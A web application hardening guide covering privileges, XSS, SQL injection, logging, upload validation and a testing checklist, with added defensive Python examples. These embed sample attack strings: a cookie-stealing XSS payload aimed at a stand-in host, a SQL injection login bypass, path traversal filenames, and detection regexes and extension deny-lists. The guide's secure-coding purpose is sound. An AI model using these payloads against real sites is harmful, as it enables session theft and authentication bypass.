Privileges
Ensure that the website application and its data are granted only the roles and privileges they need (least privilege) to reduce the risk of a breach. For example, on a Linux/Unix host the default directory permission is 755 and the default file permission is 644; the account the web server runs under should not be able to write to the application code, and directories it must write to (uploads, caches, logs) should not be executable or served as scripts.
CVSS and updates
- Developers are required to check the published Common Vulnerability Scoring System (CVSS) score and severity of any vulnerability reported in the website application or the components it uses, and to take action appropriate to that severity (patch urgency, temporary mitigations, or an accepted-risk decision).
- Developers should always keep the website code on the latest stable release of the application framework and its dependencies to pick up security fixes; otherwise the site remains exposed to publicly known attacks. For example, retarget the website to the latest supported version of ASP.NET.
PCI Compliance
Customers must review the PCI DSS guidelines, especially when the website accepts credit card payments and processes transactions.
SOAP
Data transmitted over SOAP and XML can be intercepted in transit, so an appropriate encryption mechanism should be used to protect sensitive data: at minimum TLS (HTTPS) on the transport, and WS-Security message-level encryption and signing where a message passes through intermediaries that must not be able to read or alter it.
Captcha
Offers the website protection against spam and automated submissions originating from different website pages, for example blog comments, Contact us, registration forms, online polls, newsletter sign-ups, etc.
XSS attacks
There are several categories of XSS attack, such as reflected and stored attacks (and DOM-based XSS, which happens entirely in the browser). These attacks can have unpredictable consequences such as stealing session cookies via JavaScript or delivering Trojan programs to visitors. Perform input validation to prevent attribute tampering and XSS injection, and encode every piece of untrusted data for the context in which it is output (HTML body, attribute value, JavaScript, URL). For example:
- In ASP.NET, keep request validation enabled with <pages validateRequest="true" /> in the <system.web> section of web.config (it is on by default). Request validation rejects input that looks like HTML markup; it is a defence-in-depth measure only, not a substitute for output encoding, since payloads that contain no angle brackets (for example an injected onfocus attribute) pass straight through it.
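As an added example (not code from the original page; written in Python rather than ASP.NET so it runs anywhere), the following contrasts a template that concatenates user input into HTML with one that applies contextual output encoding, and shows why request validation on its own is not enough. The request_validation_rejects function is a simplified approximation of the ASP.NET check written for this example; the two payloads are constructed probes.

```python
import html
import re

# Constructed probes (not from the original page): a classic reflected-XSS
# payload, and an attribute-context payload that contains no '<' at all.
SCRIPT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'

# Rough approximation of ASP.NET request validation (assumption: the real
# implementation has more rules, but this is the shape of the check): reject
# values containing '<' followed by a letter, '!', '/' or '?', or '&#'.
_REQUEST_VALIDATION = re.compile(r"<[A-Za-z!/?]|&#")


def request_validation_rejects(value: str) -> bool:
    """True if the simplified request validation would reject this input."""
    return _REQUEST_VALIDATION.search(value) is not None


def render_greeting_unsafe(name: str) -> str:
    """'Before': untrusted input concatenated into a text node and an attribute."""
    return f'<p>Hello {name}</p><input name="q" value="{name}">'


def render_greeting_safe(name: str) -> str:
    """'After': contextual output encoding.

    html.escape(quote=True) encodes & < > " and ', which is the right
    encoding for HTML text nodes and for quoted attribute values.
    """
    encoded = html.escape(name, quote=True)
    return f'<p>Hello {encoded}</p><input name="q" value="{encoded}">'


def contains_script_tag(markup: str) -> bool:
    """True if a live <script> tag survived into the markup."""
    return "<script" in markup.lower()


def contains_event_handler(markup: str) -> bool:
    """True if an un-encoded on* event handler attribute appears in the markup."""
    return re.search(r'\son[a-z]+="', markup) is not None


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("request validation rejects:", request_validation_rejects(payload))
        print("unsafe:", render_greeting_unsafe(payload))
        print("safe:  ", render_greeting_safe(payload))
```

The attribute payload is the interesting case: request validation lets it through because it has no angle brackets, the unsafe template turns it into a working onfocus handler, and only the encoded output neutralises it. Data placed inside a JavaScript block or a URL needs a different encoder again; HTML escaping is not enough there.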
Database injection
- Use prepared statements and parameterized queries, so that data values are sent to the database separately from the SQL text.
- Allow-list (white list) input validation for the parts of a query that cannot be parameterized, such as table or column names used in ORDER BY.
- Stored procedures, provided they do not build dynamic SQL from their arguments internally (a procedure that concatenates its input into a string and executes it is just as injectable).
- Avoid dynamic queries assembled by string concatenation or formatting.
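The following is an added example (not the original page's code) that runs the four points above against an in-memory SQLite database with constructed sample rows: a login query built by string formatting is bypassed by a classic payload, the parameterized version is not, and a sort column that cannot be parameterized is checked against an allow-list before it is spliced into the query. Passwords are stored in clear only to keep the example short; real code stores a salted hash.

```python
import sqlite3

# Columns a caller may sort by; anything else is rejected (allow-list).
ALLOWED_SORT_COLUMNS = frozenset({"username", "created_at"})


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample users (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, created_at TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, created_at) VALUES (?, ?, ?)",
        [("alice", "s3cret", "2024-01-01"), ("bob", "hunter2", "2024-02-01")],
    )
    return conn


def login_unsafe(conn, username: str, password: str):
    """'Before': dynamic query built by string formatting.

    With the password ' OR '1'='1 the WHERE clause becomes
    ... AND password = '' OR '1'='1', which is true for every row.
    """
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """'After': parameterized query. The driver sends the values separately
    from the SQL text, so the same payload is compared literally to the
    stored password and matches nothing."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def is_allowed_sort_column(column: str) -> bool:
    return column in ALLOWED_SORT_COLUMNS


def list_users_sorted(conn, sort_column: str):
    """Identifiers (column names) cannot be bound as parameters, so the only
    safe option is an allow-list check before the name goes into the SQL."""
    if not is_allowed_sort_column(sort_column):
        raise ValueError(f"sort column not allowed: {sort_column!r}")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {sort_column}")
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("unsafe login, injected password:", login_unsafe(db, "alice", payload))
    print("safe login, injected password:  ", login_safe(db, "alice", payload))
    print("safe login, real password:      ", login_safe(db, "bob", "hunter2"))
```

The unsafe function returns the first user in the table for any username, including one that does not exist, which is the classic authentication bypass; the safe one returns a row only when both values match exactly.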
Code Injection
This type of attack results from inadequate input and output validation. An obvious example is the eval() function. The eval() language construct is very dangerous because it executes arbitrary PHP code passed to it as a string, so any user input that reaches eval() gives the attacker code execution on the server. Review the code for eval() and for related constructs that execute or include code from strings, and conduct proper data validation to avoid this class of risk; where only a small language (for example arithmetic) is really needed, parse the input and interpret an allow-list of constructs instead of handing it to the language's own evaluator.
Logging
Audit logs are used to track activity. Enable logging at the database level to keep track of logins and of changes made to the database. HTTP logs (access and error logs) are also very useful during debugging, security investigations and for other purposes. These logs should therefore be kept in a secure place, writable by the web server but not modifiable by the web application's own account, and retained long enough to support an investigation; an attacker who can edit the logs can erase the trail.
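To show what an investigation actually does with access logs, here is an added example (not from the original page) that parses constructed Combined Log Format lines and flags the indicators a reviewer would look for first: path traversal and SQL injection attempts in the request path, requests using HTTP methods the application does not serve, and bursts of authentication failures from one address. The log lines, the threshold and the set of expected methods are all assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines in Combined Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /download?file=../../web.config HTTP/1.1" 403 12 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "TRACE / HTTP/1.1" 405 0 "-" "curl/8.0"
192.0.2.9 - - [10/Oct/2023:13:56:01 +0000] "POST /login HTTP/1.1" 401 118 "-" "python-requests/2.31"
192.0.2.9 - - [10/Oct/2023:13:56:02 +0000] "POST /login HTTP/1.1" 401 118 "-" "python-requests/2.31"
192.0.2.9 - - [10/Oct/2023:13:56:03 +0000] "POST /login HTTP/1.1" 401 118 "-" "python-requests/2.31"
192.0.2.9 - - [10/Oct/2023:13:56:04 +0000] "POST /login HTTP/1.1" 401 118 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client - user [timestamp] "METHOD path protocol" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SQLI = re.compile(r"""(['"])\s*(or|and)\s+|union\s+select|;\s*(drop|exec)\b|--\s*$""", re.I)
ALLOWED_METHODS = {"GET", "HEAD", "POST"}   # assumed: what this app serves
AUTH_FAILURE_THRESHOLD = 3                  # assumed; real tooling uses a time window


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def analyze(log_text: str) -> dict:
    """Return {ip: sorted list of indicator names} for addresses worth a second look."""
    findings = defaultdict(set)
    auth_failures = defaultdict(int)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip = rec["ip"]
        # Decode twice: attackers double-encode to slip past naive filters.
        path = unquote(unquote(rec["path"])).lower()
        if "../" in path or "..\\" in path:
            findings[ip].add("traversal")
        if SQLI.search(path):
            findings[ip].add("sqli")
        if rec["method"] not in ALLOWED_METHODS:
            findings[ip].add("unexpected-method")
        if rec["status"] == "401":
            auth_failures[ip] += 1
            if auth_failures[ip] >= AUTH_FAILURE_THRESHOLD:
                findings[ip].add("auth-failure-burst")
    return {ip: sorted(tags) for ip, tags in findings.items()}


if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

Note that the traversal attempt was already answered with 403 and the injection with 500: the server blocked or choked on the request, but the log is the only place the attempt is visible, which is why the logs themselves must be protected.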
Indexing
Use a robots.txt file placed in the website root directory to control crawler access and prevent unwanted crawling. Note that robots.txt is advisory only: well-behaved crawlers honour it, but it does not restrict access, and listing sensitive paths in it discloses them to anyone who reads the file. Protect sensitive content with authentication or server configuration, not with robots.txt.
Unmapped files
Adjust the handler/extension mapping or the error handler so that files with unmapped extensions can be neither downloaded as source nor interpreted as code: either return an error for them or serve their content in a harmless form (e.g. as HTML or plain text). Backup and editor copies such as web.config.bak or page.aspx.old are the usual way source code leaks through this gap.
HTTP methods
Some HTTP methods can pose security risks to the web application by allowing an attacker to create or modify files stored on the server, for example PUT and DELETE and the WebDAV methods (PROPFIND, COPY, MOVE, MKCOL); TRACE can also be abused to reflect request headers, including cookies, back to a script. Disable these methods on the server (in IIS, through Request Filtering's verb allow-list) or limit them to authenticated, trusted users, and verify with an OPTIONS request that only the expected methods are advertised.
SSL
It establishes an encrypted connection between the client and the server over HTTPS; in practice this means TLS today, as the SSL protocol versions themselves are deprecated and should be disabled. Building the website with a valid certificate offers several benefits: credentials and session cookies are protected in transit, users get a stronger assurance that they are on the genuine site (which helps against phishing), search ranking, etc.
Dedicated APP pool
Application pools separate sets of IIS worker processes that share the same configuration and application boundaries. It is highly recommended to create each website with a dedicated application pool, running under its own low-privileged identity (e.g. the built-in ApplicationPoolIdentity), since this offers isolation, better security, reliability and performance: a compromise or crash of one site does not directly affect the others sharing the server.
General guidelines and testing
- Conduct a periodic inventory on the website content and make sure that it doesn’t contain any suspicious files.
- Remove any unnecessary or unused files from the server.
- Restrict access to sensitive files.
- Restrict HTTP uploads in the application to specific trusted extensions, checked server-side against an allow-list, and store uploaded files outside the web root or in a directory where script execution is disabled.
- Make sure a recent backup copy is stored locally as well, even if the server hosting the website is backed up to different locations.
- Send credentials and other sensitive data with the POST method over HTTPS so that they travel on an encrypted channel instead of in clear text, and never in URL query strings, which end up in logs and browser history.
- Protect the website configuration files by restricting access to them and by encrypting sensitive sections (e.g. the connection strings in web.config, using ASP.NET's protected configuration feature) rather than leaving secrets in clear text in the files.
- Determine if the code contains backdoor credentials.
- Test the anonymous authentication process.
- Test FTP access, restriction and directory isolation.
- Submit SQL injection test payloads to make sure that the website rejects or neutralises them according to defined rules, and that no error page reveals the underlying query.
- Test the default accounts and passwords and make sure that they have no access to the website.
- Test the website for cross-site scripting.
- Test login with a non-existent user and with a wrong password; both should produce the same response and similar timing, so that valid usernames cannot be enumerated.
- Test the error handling, especially error pages that could contain sensitive information (stack traces, file paths, connection strings); custom error pages should be enabled in production.
- Test the APIs, classes, functions, methods.
- Test input validation and output encoding.
- Test session management (cookie flags, expiry, regeneration after login) and protection against brute-force attacks (lockout or rate limiting).
- Test the HTTP response headers using tools such as netcat or curl, and remove headers that disclose server or framework versions.
- Test for path traversal, including functionality that is only reachable after authentication, and check whether it can be used to obtain higher privileges.
- Perform a penetration test toward the application in order to identify any vulnerability after the deployment phase.
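The upload-extension and path-traversal items in the list above are easiest to see in code, so here is an added example (not the original page's code) of the server-side checks an upload handler should apply to a client-supplied filename before writing anything: null bytes, client-supplied directory parts, trailing dots that Windows silently drops, double extensions such as shell.aspx.jpg, and a final check that the resolved path is still inside the upload directory. The allowed and executable extension sets and the upload directory are assumptions for the example.

```python
import os
import re
import tempfile

# Extensions the application accepts (allow-list), and extensions that must
# not appear anywhere in the name because a server or handler might execute
# them (e.g. shell.aspx.jpg on a server that honours the first extension).
ALLOWED_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif", "pdf"})
EXECUTABLE_EXTENSIONS = frozenset({
    "asp", "aspx", "ashx", "asmx", "cer", "config", "php", "php3", "phtml",
    "jsp", "jspx", "cgi", "pl", "py", "exe", "dll", "htaccess",
})
# First character alphanumeric (no dotfiles), then a bounded set of safe characters.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")
# Assumed upload directory for the example; a real deployment puts this
# outside the web root or in a folder where script execution is disabled.
UPLOAD_ROOT = os.path.join(tempfile.gettempdir(), "uploads")


def validate_upload_name(filename: str) -> str:
    """Return a safe basename for a client-supplied filename, or raise ValueError."""
    if "\x00" in filename:
        raise ValueError("null byte in filename")
    # Keep only the basename: client-supplied directory parts are never trusted.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows silently drops trailing dots and spaces, so "shell.aspx." would be
    # stored as shell.aspx; normalise before looking at the extension.
    name = name.rstrip(". ")
    if not _SAFE_NAME.match(name):
        raise ValueError(f"unsafe characters in filename: {filename!r}")
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise ValueError("missing extension")
    if parts[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: .{parts[-1]}")
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:-1]):
        raise ValueError("executable extension inside filename")
    return name


def is_allowed_upload(filename: str) -> bool:
    try:
        validate_upload_name(filename)
        return True
    except ValueError:
        return False


def resolve_upload_path(upload_root: str, filename: str) -> str:
    """Absolute path under upload_root for the file; refuses anything outside it."""
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, validate_upload_name(filename)))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes upload directory")
    return target


if __name__ == "__main__":
    for candidate in ("photo.JPG", "shell.aspx", "shell.aspx.jpg", "shell.aspx.",
                      "..\\..\\web.config", "../../etc/passwd", "photo.jpg\x00.aspx"):
        print(f"{candidate!r:28} allowed={is_allowed_upload(candidate)}")
    print(resolve_upload_path(UPLOAD_ROOT, "photo.jpg"))
```

Even with these checks, the safest design stores the file under a server-generated random name and serves it from a location that the web server treats as static content only; the extension check then protects the application, and the storage location protects the server if the check is ever bypassed.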